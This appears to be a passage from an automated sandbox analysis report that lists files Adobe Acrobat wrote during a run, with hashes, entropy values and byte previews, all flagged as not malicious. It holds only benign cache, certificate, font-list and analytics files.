                                                                                                        Preview:*...#................version.1..namespace-.aw.o................next-map-id.1.Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.0I.$.r................next-map-id.2.Snamespace-9a9aa6d6_c307_4dda_b6c0_dc91084c8e68-https://rna-v2-resource.acrobat.com/.1!...r................next-map-id.3.Snamespace-1fbd9dc5_70a3_4975_91b4_966e0915c27a-https://rna-v2-resource.acrobat.com/.2..N.o................next-map-id.4.Pnamespace-0e0aed8d_6d6f_4be0_b28f_8e02158bc792-https://rna-resource.acrobat.com/.3*.z.o................next-map-id.5.Pnamespace-52652c26_09c2_43f2_adf7_da56a1f00d32-https://rna-resource.acrobat.com/.4.{.^...............Pnamespace-aa11265e_f35e_4e5d_85db_f163e1c0f691-https://rna-resource.acrobat.com/.C..r................next-map-id.6.Snamespace-3a89c6b0_72b9_411a_9e44_fa247f34ac91-https://rna-v2-resource.acrobat.com/.5.q._r................next-map-id.7.Snamespace-02b23955_9103_42e0_ba64_3f8683969652-https://rna-v2-resource.acrobat.com/.6..d.o..............
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):332
                                                                                                        Entropy (8bit):5.208058958339031
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:7PpzYIq2PcNwi2nKuAl9OmbzNMxIFUt8OPpzLfZmw+OPpzT/FrvzkwOcNwi2nKuP:7RYIvLZHAa8jFUt8ORLf/+ORrF54ZHAo
                                                                                                        MD5:B90F95E927263304DC8D4897E0DBE09A
                                                                                                        SHA1:BE4D1E7AA89F859A5099AEC794BC2DB31EEC2680
                                                                                                        SHA-256:C6CA0C0B83A06A7C7D6B9F78C4851E243C2F9FF346375D1D54860ADE0B126808
                                                                                                        SHA-512:040FDE66D9795AE4A6C0711F2465CB293FC869D3BBADE7230CC30CC8EC278B021379968BA8A0B04FB0FDA47D8A90841A0DD42A939B678F014C721E81FC4CF8DB
                                                                                                        Malicious:false
                                                                                                        Preview:2024/12/18-12:48:33.595 1e00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-12:48:33.598 1e00 Recovering log #3.2024/12/18-12:48:33.600 1e00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:ASCII text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):332
                                                                                                        Entropy (8bit):5.208058958339031
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:7PpzYIq2PcNwi2nKuAl9OmbzNMxIFUt8OPpzLfZmw+OPpzT/FrvzkwOcNwi2nKuP:7RYIvLZHAa8jFUt8ORLf/+ORrF54ZHAo
                                                                                                        MD5:B90F95E927263304DC8D4897E0DBE09A
                                                                                                        SHA1:BE4D1E7AA89F859A5099AEC794BC2DB31EEC2680
                                                                                                        SHA-256:C6CA0C0B83A06A7C7D6B9F78C4851E243C2F9FF346375D1D54860ADE0B126808
                                                                                                        SHA-512:040FDE66D9795AE4A6C0711F2465CB293FC869D3BBADE7230CC30CC8EC278B021379968BA8A0B04FB0FDA47D8A90841A0DD42A939B678F014C721E81FC4CF8DB
                                                                                                        Malicious:false
                                                                                                        Preview:2024/12/18-12:48:33.595 1e00 Reusing MANIFEST C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/MANIFEST-000001.2024/12/18-12:48:33.598 1e00 Recovering log #3.2024/12/18-12:48:33.600 1e00 Reusing old log C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Session Storage/000003.log .
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PC bitmap, Windows 3.x format, 117 x -152 x 32, cbSize 71190, bits offset 54
                                                                                                        Category:dropped
                                                                                                        Size (bytes):71190
                                                                                                        Entropy (8bit):0.6388771701050051
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:96:HS5at+Ftrr8KM07UMMHVbrV+J0j/OJAQm1PP1/oOX4QMMATibG/MYz4:e4689nIe64
                                                                                                        MD5:DB1651DFC49A39D01E5704CDAEF183F6
                                                                                                        SHA1:CB961715B5B4BD6733F4F71A90938ABA0CE5D962
                                                                                                        SHA-256:A20833F17AB566A97C2308CB6DE3F97CC08352CB3CEF021F1C54558819FFD64A
                                                                                                        SHA-512:29F919F5949CD56692C9EF3E9B0F857785460EC99324CFC7D7249827F4904DC050E33CC727E7A8E8FE9FDF1F062B470C40C1E3AD8E6EDC9B2821DD57B2562C14
                                                                                                        Malicious:false
                                                                                                        Preview:BM........6...(...u...h..... ...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 15, database pages 21, cookie 0x5, schema 4, UTF-8, version-valid-for 15
                                                                                                        Category:dropped
                                                                                                        Size (bytes):86016
                                                                                                        Entropy (8bit):4.439383851217769
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:384:yeaci5GiiBA7vEmzKNURFXoD1NC1SK0gkzPlrFzqFK/WY+lUTTcKqZ5bEmzVz:1SurVgazUpUTTGt
                                                                                                        MD5:E19D45F873F97DC3622FB4B8F6E6282E
                                                                                                        SHA1:AD3A3E1B22D9EE293CBD1986E2CBEBBC24D04E4D
                                                                                                        SHA-256:205CE2B6DF6CA4C13DC8432DBE00CDD28463E0C7C73946FC1AA50E348F27E68B
                                                                                                        SHA-512:17E09614C5AB5A393C9311B36BBB5CA5CC8FAE57F69E67005A6C15D68CB9E107045A990118E4CF084D4D4A191392B78D2DD555EEED09BBBA245044B98A776E8F
                                                                                                        Malicious:false
                                                                                                        Preview:SQLite format 3......@ ..........................................................................c.......1........T...U.1.D............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:SQLite Rollback Journal
                                                                                                        Category:dropped
                                                                                                        Size (bytes):8720
                                                                                                        Entropy (8bit):3.77624547817129
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:48:7M2cp/E2ioyVIioy3DoWoy1CABoy1cKOioy1noy1AYoy1Wioy1hioybioyyoy1n9:7QpjuI0iAkXKQLDb9IVXEBodRBk3
                                                                                                        MD5:7E93FCA12F63FB135A28D6BCA1FE05D1
                                                                                                        SHA1:3B08CE7D6B3E44E5DF6048A5712AB21BB75B0A95
                                                                                                        SHA-256:E95D9E89A6C062EEC2EE633A87F086203D9E23EDDA3D556CE27D613ADD7F0658
                                                                                                        SHA-512:047DE3752391C83C4074DF5D4D4134E1213B42D40A98D5B0F34114D10686E023EFD2C8BF818D529EA3AC871F8FEFD951A9F924D7D42254A6B68186BA45204D0C
                                                                                                        Malicious:false
                                                                                                        Preview:.... .c......m.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................T...[...b...r...t...}.....L..............................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:Certificate, Version=3
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1391
                                                                                                        Entropy (8bit):7.705940075877404
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:ooVdTH2NMU+I3E0Ulcrgdaf3sWrATrnkC4EmCUkmGMkfQo1fSZotWzD1:ooVguI3Kcx8WIzNeCUkJMmSuMX1
                                                                                                        MD5:0CD2F9E0DA1773E9ED864DA5E370E74E
                                                                                                        SHA1:CABD2A79A1076A31F21D253635CB039D4329A5E8
                                                                                                        SHA-256:96BCEC06264976F37460779ACF28C5A7CFE8A3C0AAE11A8FFCEE05C0BDDF08C6
                                                                                                        SHA-512:3B40F27E828323F5B91F8909883A78A21C86551761F27B38029FAAEC14AF5B7AA96FB9F9CC93EE201B5EB1D0FEF17B290747E8B839D2E49A8F36C5EBF3C7C910
                                                                                                        Malicious:false
                                                                                                        Preview:0..k0..S............@.YDc.c...0...*.H........0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10...150604110438Z..350604110438Z0O1.0...U....US1)0'..U... Internet Security Research Group1.0...U....ISRG Root X10.."0...*.H.............0..........$s..7.+W(.....8..n<.W.x.u...jn..O(..h.lD...c...k....1.!~.3<.H..y.....!.K...qiJffl.~<p..)"......K...~....G.|.H#S.8.O.o...IW..t../.8.{.p!.u.0<.....c...O..K~.....w...{J.L.%.p..)..S$........J.?..aQ.....cq...o[...\4ylv.;.by.../&.....................6....7..6u...r......I.....*.A..v........5/(.l....dwnG7..Y^h..r...A)>Y>.&.$...Z.L@.F....:Qn.;.}r...xY.>Qx....../..>{J.Ks......P.|C.t..t.....0.[q6....00\H..;..}`...).........A.......|.;F.H*..v.v..j.=...8.d..+..(.....B.".'].y...p..N..:..'Qn..d.3CO......B0@0...U...........0...U.......0....0...U......y.Y.{....s.....X..n0...*.H.............U.X....P.....i ')..au\.n...i/..VK..s.Y.!.~.Lq...`.9....!V..P.Y...Y.............b.E.f..|o..;.....'...}~.."......
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 71954 bytes, 1 file, at 0x2c +A "authroot.stl", number 1, 6 datablocks, 0x1 compression
                                                                                                        Category:dropped
                                                                                                        Size (bytes):71954
                                                                                                        Entropy (8bit):7.996617769952133
                                                                                                        Encrypted:true
                                                                                                        SSDEEP:1536:gc257bHnClJ3v5mnAQEBP+bfnW8Ctl8G1G4eu76NWDdB34w18R5cBWcJAm68+Q:gp2ld5jPqW8LgeulxB3fgcEfDQ
                                                                                                        MD5:49AEBF8CBD62D92AC215B2923FB1B9F5
                                                                                                        SHA1:1723BE06719828DDA65AD804298D0431F6AFF976
                                                                                                        SHA-256:B33EFCB95235B98B48508E019AFA4B7655E80CF071DEFABD8B2123FC8B29307F
                                                                                                        SHA-512:BF86116B015FB56709516D686E168E7C9C68365136231CC51D0B6542AE95323A71D2C7ACEC84AAD7DCECC2E410843F6D82A0A6D51B9ACFC721A9C84FDD877B5B
                                                                                                        Malicious:false
                                                                                                        Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):192
                                                                                                        Entropy (8bit):2.756901573172974
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:3:kkFkl1Dp8ENllXfllXlE/HT8k2P7l1NNX8RolJuRdxLlGB9lQRYwpDdt:kKNEmT8rl7NMa8RdWBwRd
                                                                                                        MD5:62F2B500474EBC49FF03DB363E1F735A
                                                                                                        SHA1:74A1B9494FF1E43A5B987651BB5BAFC01593A036
                                                                                                        SHA-256:C98DEF8FA2AABAC52E7040BA986D97D2BA528CCA9BBBC1E232C3E943B0F6A8CD
                                                                                                        SHA-512:984BE4596512806577F96C193DD188C00F2A41477663C3DD18D68A0A8FA6A66B96B61AF05F878457D22C54E6907BC335546DF490D974407CC3463C2B232936B4
                                                                                                        Malicious:false
                                                                                                        Preview:p...... ........F&..uQ..(....................................................... ..........W....S...............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                                                        File Type:data
                                                                                                        Category:modified
                                                                                                        Size (bytes):328
                                                                                                        Entropy (8bit):3.1391791584200512
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:kKhC9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:p9DnLNkPlE99SNxAhUe/3
                                                                                                        MD5:C92C63C430A2E7C01F982D445404FAD0
                                                                                                        SHA1:217C49372AB0DB003AFAA764456C3BF9DDE77160
                                                                                                        SHA-256:516733378F99DF2218A1F03A6C6D47380B35160DC30532D1286649CD8C7ABBCD
                                                                                                        SHA-512:244325A7AC571AF7681236B4D5258E101733D9614BEA8B2CE4C3A81A17EDD07D01FB04BCC8A636F69AB97030863255D649C509A678361471D83C357900F5768C
                                                                                                        Malicious:false
                                                                                                        Preview:p...... ...........*uQ..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1233
                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1233
                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):1233
                                                                                                        Entropy (8bit):5.233980037532449
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                                                        MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                                                        SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                                                        SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                                                        SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10880
                                                                                                        Entropy (8bit):5.214360287289079
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:PostScript document text
                                                                                                        Category:dropped
                                                                                                        Size (bytes):10880
                                                                                                        Entropy (8bit):5.214360287289079
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                                                        MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                                                        SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                                                        SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                                                        SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                                                        Malicious:false
                                                                                                        Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):295
                                                                                                        Entropy (8bit):5.362313125911137
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJM3g98kUwPeUkwRe9:YvXKXFQSE1bsdTeOgGMbLUkee9
                                                                                                        MD5:82F2A0D37A737812A875C186BD8D18CD
                                                                                                        SHA1:A1C14DE83DDEEDB698AFFAE53BD92FB2110EE05A
                                                                                                        SHA-256:8A7CEF2715E8D17B15002D8D557E6776781A7F566D6563CB804FBF5806C7D288
                                                                                                        SHA-512:F7272D944438F2B9785385C17A5385196C0DF2EC7FD5F21A79DDE8524B9701ACDA27B0FF9944E7D6BD14F4310521C9AAFE9AB7975B37344E2C7BBE3B5A8C79AF
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.295814548516142
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJfBoTfXpnrPeUkwRe9:YvXKXFQSE1bsdTeOgGWTfXcUkee9
                                                                                                        MD5:44651FCAF8A37FA0AD63E0B9E13CF953
                                                                                                        SHA1:7B52E49279337F2700C776974DEF1C428FE57A9D
                                                                                                        SHA-256:E3E008CF401477E23999FDD7D0FA5F81D71DF8C8C33AC653041A0CE56D04488E
                                                                                                        SHA-512:16A239969A1E2C48EF36A358D10DFC11753B0966DDE5E912A1294EE6C411EF5591A8C279F29BCED9A1893346E92654A6FE61A9E91FC358D86A5BFD824597DA76
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):294
                                                                                                        Entropy (8bit):5.274362865042146
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJfBD2G6UpnrPeUkwRe9:YvXKXFQSE1bsdTeOgGR22cUkee9
                                                                                                        MD5:0F19548BBF82D8CE13D6CBDC04C45DC2
                                                                                                        SHA1:E29951F6670E5425C7DE182CA96E96F19FB57D2B
                                                                                                        SHA-256:97E09A5CEC2425212524C4F48415C794E3C0A214ADAE6733168E715003938758
                                                                                                        SHA-512:8B3229324B0290C7B52A346ACC0E7248C08B5FBCCF69A4D8BE39BBB0B4D45D54CEF8C3CCD7396DEAAD08A398D1F7F89EEF7287DF6407FE41D003DE8C2181AEFF
                                                                                                        Malicious:false
                                                                                                        Preview:{"analyticsData":{"responseGUID":"27aa94e9-700b-4c49-afb9-a436fb7fe7c6","sophiaUUID":"83ABFDB2-FC78-4BD3-A96C-A13541192F3B"},"encodingScheme":true,"expirationDTS":1734718722895,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                        Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                        File Type:JSON data
                                                                                                        Category:dropped
                                                                                                        Size (bytes):285
                                                                                                        Entropy (8bit):5.349154577823636
                                                                                                        Encrypted:false
                                                                                                        SSDEEP:6:YEQXJ2HXFSDnSE14WsGiIPEeOF0Y/oAvJfPmwrPeUkwRe9:YvXKXFQSE1bsdTeOgGH56Ukee9
                                                                                                        MD5:6C9E929722A738ACD4874399E1FB94D2
                                                                                                        SHA1:BE6F6DAE38BF3AEB4030231BF61DABE4625AD25C
                                                                                                        SHA-256:0ED5877D22777C65853740F53F5489CCCCDBD8F8998B25E21C53E9DC46015104
